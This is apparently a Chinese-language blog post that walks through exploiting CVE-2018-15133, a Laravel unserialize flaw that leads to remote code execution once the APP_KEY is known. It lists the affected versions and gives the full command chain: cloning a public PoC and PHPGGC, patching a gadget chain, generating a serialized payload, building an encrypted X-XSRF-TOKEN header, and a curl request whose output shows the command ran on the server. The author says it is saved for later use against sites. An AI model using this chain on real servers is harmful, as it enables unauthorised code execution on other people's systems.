laravel API_KEY泄露CVE-2018-15133漏洞利用

最近刚好遇到一个站laravel,可惜不在版本,mark以后方便使用

漏洞前提:

该漏洞可以分别在两个地方触发,一个是直接添加在 cookie 字段,例如: Cookie: ATTACK=payload ;

另一处是在 HTTP Header 处添加 X-XSRF-TOKEN 字段,例如: X-XSRF-TOKEN: payload 

 

漏洞影响版本:

5.5.x<=5.5.40、5.6.x<=5.6.29

 

1.获取POC

git clone https://github.com/kozmic/laravel-poc-CVE-2018-15133.git

2.拉取PHPGGC工具(如果只是测试可以不用拉取这个工具)

git clone https://github.com/ambionics/phpggc.git

因为本地是PHP7.2环境 需要修改PHPGGC代码,执行:
sed -i -e 's/assert/system/g' gadgetchains/Laravel/RCE/1/gadgets.php

3.查看本地APP_KEY

grep -e \^APP_KEY .env
APP_KEY=base64:RFU0lGJ4lnVLMCEB5Jl8I25u5o/l7GLLkSivNLUZqro=   //demo

4.使用PHPGGC生成利用代码

phpggc Laravel/RCE1 'uname -a' -b
Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9

5.利用cve-2018-15133.php生成laravel漏洞利用代码

./cve-2018-15133.php APP_KEY Tzo0MDoiSWxsdW1pbmF0ZVxCcm9hZGNhc3RpbmdcUGVuZGluZ0Jyb2FkY2FzdCI6Mjp7czo5OiIAKgBldmVudHMiO086MTU6IkZha2VyXEdlbmVyYXRvciI6MTp7czoxMzoiACoAZm9ybWF0dGVycyI7YToxOntzOjg6ImRpc3BhdGNoIjtzOjY6InN5c3RlbSI7fX1zOjg6IgAqAGV2ZW50IjtzOjg6InVuYW1lIC1hIjt9
PoC for Unserialize vulnerability in Laravel <= 5.6.29 (CVE-2018-15133) by @kozmic

HTTP header for POST request: 
X-XSRF-TOKEN: eyJpdiI6Im1oalNPUzZIMlFZeVBXYjdRb2FDRFE9PSIsInZhbHVlIjoid3JcL09JRGVZWnBUSjlYREY1RHlTUzl0bTRIUjlFdHYwNVBpYk9iOTg5dngrRTROYk9GQllkckVMdXl4ckoxWmpWbmc1NVhIelB1K25XdDRZZTBkMXRIbDlYUzdsZWQ2SUNYZmNuRmhNRmU5XC8wOGZKMEJLUEY3OW1CXC9mWXBBcnhCR3dcL0Qzenl4QzlCSVFiN3paK1V5YTVicGFzMFYwelIwZWppZ3BYbDhzdjVDSDE3Z3N4Tjk1VHVyQytJbWd0bjN4dTVcL1pyT2oyVDJWR29iVHdBcTdoRkszMGFqSSs2eTlhbTdjVlhcL0c2V3VGdEdDZ2RrSG4rXC9jYWFPNVhJazUiLCJtYWMiOiI0MTY1MDNkN2UwODI5ZDc4YTg5YTY3N2U5MjY0YWZiN2U2YjdlMTAxNTZiYTIyODhkNmY1YmYxMmFkNzgyNTFhIn0=

6.测试漏洞

curl -X POST http://web.black_card.me/login -H 'X-XSRF-TOKEN: eyJpdiI6Im1oalNPUzZIMlFZeVBXYjdRb2FDRFE9PSIsInZhbHVlIjoid3JcL09JRGVZWnBUSjlYREY1RHlTUzl0bTRIUjlFdHYwNVBpYk9iOTg5dngrRTROYk9GQllkckVMdXl4ckoxWmpWbmc1NVhIelB1K25XdDRZZTBkMXRIbDlYUzdsZWQ2SUNYZmNuRmhNRmU5XC8wOGZKMEJLUEY3OW1CXC9mWXBBcnhCR3dcL0Qzenl4QzlCSVFiN3paK1V5YTVicGFzMFYwelIwZWppZ3BYbDhzdjVDSDE3Z3N4Tjk1VHVyQytJbWd0bjN4dTVcL1pyT2oyVDJWR29iVHdBcTdoRkszMGFqSSs2eTlhbTdjVlhcL0c2V3VGdEdDZ2RrSG4rXC9jYWFPNVhJazUiLCJtYWMiOiI0MTY1MDNkN2UwODI5ZDc4YTg5YTY3N2U5MjY0YWZiN2U2YjdlMTAxNTZiYTIyODhkNmY1YmYxMmFkNzgyNTFhIn0='| head -n 2
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1616    0  1616    0     0   4603      0 --:--:-- --:--:-- --:--:--  4603
Linux 9a29d8604c7a 4.15.0-42-generic #45-Ubuntu SMP Thu Nov 15 19:32:57 UTC 2018 x86_64 GNU/Linux
<!DOCTYPE html>

 

# http://blog.tuo0.com/2018/12/16/php/laravel-CVE-2018-15133%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

# https://xz.aliyun.com/t/6533

 

posted @ 2021-03-25 19:06  sevck  阅读(2034)  评论(0编辑  收藏  举报